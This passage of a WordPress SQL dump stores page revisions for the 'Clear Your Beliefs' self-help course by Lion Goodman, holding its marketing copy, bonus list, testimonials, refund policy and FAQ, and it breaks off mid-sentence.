wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n<p>	<strong>=&gt; <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<strong>=&gt; <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n<strong>=&gt; <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n<strong>=&gt; <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n<strong>=&gt; <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n<strong>=&gt; <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>=&gt; <em>Professional Coaching Sessions:</strong> </em> Optional.</p>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>', 'Clear Your Beliefs Program', '', 'inherit', 'open', 'open', '', '1941-revision-v1', '', '', '2015-05-29 13:23:18', '2015-05-29 18:23:18', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2219, 2, '2015-07-07 14:57:11', '2015-07-07 19:57:11', '&nbsp;\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s 